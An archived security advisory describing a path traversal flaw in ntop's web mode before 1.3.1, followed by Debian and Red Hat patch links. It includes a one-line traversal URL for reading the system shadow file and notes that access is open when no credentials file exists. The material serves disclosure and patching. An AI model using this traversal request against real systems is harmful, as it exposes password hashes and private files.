TUCoPS :: Linux :: Discontinued :: ntop~1.txt

Ntop vulnerability

COMMAND

    ntop

SYSTEMS AFFECTED

    ntop prior to 1.3.1

PROBLEM

    Following is based on [ Hackerslab bug_paper ].  ntop displays top
    network users.  With -w switch it starts ntop in web mode.  Users
    can attach their web browsers to the specified port and browse
    traffic information remotely.

    Supposing to start ntop at the  port 3000 (ntop -w 3000), the  URL
    to access is

        http://hostname:3000/

    The file ~/.ntop specifies the HTTP user/password of those  people
    who are allowed to  access ntop.  If  the ~/.ntop file is  missing
    no  security  will  be  used  hence  everyone  can  access traffic
    information.  A simple .ntop file is the following:

        # # .ntop File format
        #  #  user<tab>/<space>pw
        # # luca      linux

    Please note that an HTTP server is NOT needed in order to use  the
    program in interactive mode.*  'bdf' program has SUID  permission.
    If use  'ntop' in  web mode,  it's web  root is  "/etc/ntop/html".
    It's web mode that does not check URL path.

    So if URL is

        http://URL:port/../../shadow

    remote user will read all file.

SOLUTION

    The problem above has been reported to the author and it has  been
    fixed immediately.  There  were few other security  related issues
    which have  been fixed  as well.   With ersion  1.3.1 it  properly
    returns 401 code when trying to access '..' paths.

    The  "ntop"  package  is  not  a  part  of  Debian 2.1.  No fix is
    necessary.   As  for  Debian  2.2  alias  potato,  this version of
    Debian is  not yet  released.   Fixes are  currently available for
    Alpha, ARM, Intel ia32, Motorola 680x0, PowerPC and the Sun  Sparc
    architecture:

        http://security.debian.org/dists/potato/updates/main/source/ntop_1.2a7-10.diff.gz
        http://security.debian.org/dists/potato/updates/main/source/ntop_1.2a7-10.dsc
        http://security.debian.org/dists/potato/updates/main/source/ntop_1.2a7.orig.tar.gz

        http://security.debian.org/dists/potato/updates/main/binary-alpha/ntop_1.2a7-10_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-arm/ntop_1.2a7-10_arm.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/ntop_1.2a7-10_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/ntop_1.2a7-10_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/ntop_1.2a7-10_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/ntop_1.2a7-10_sparc.deb

    Debian Unstable alias woody is  not yet released and reflects  the
    current development release.  Fixes are the same as for potato.

    For RedHat:

        ftp://updates.redhat.com/powertools/6.2/sparc/ntop-1.3.1-1.sparc.rpm
        ftp://updates.redhat.com/powertools/6.2/i386/ntop-1.3.1-1.i386.rpm
        ftp://updates.redhat.com/powertools/6.2/SRPMS/ntop-1.3.1-1.src.rpm

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH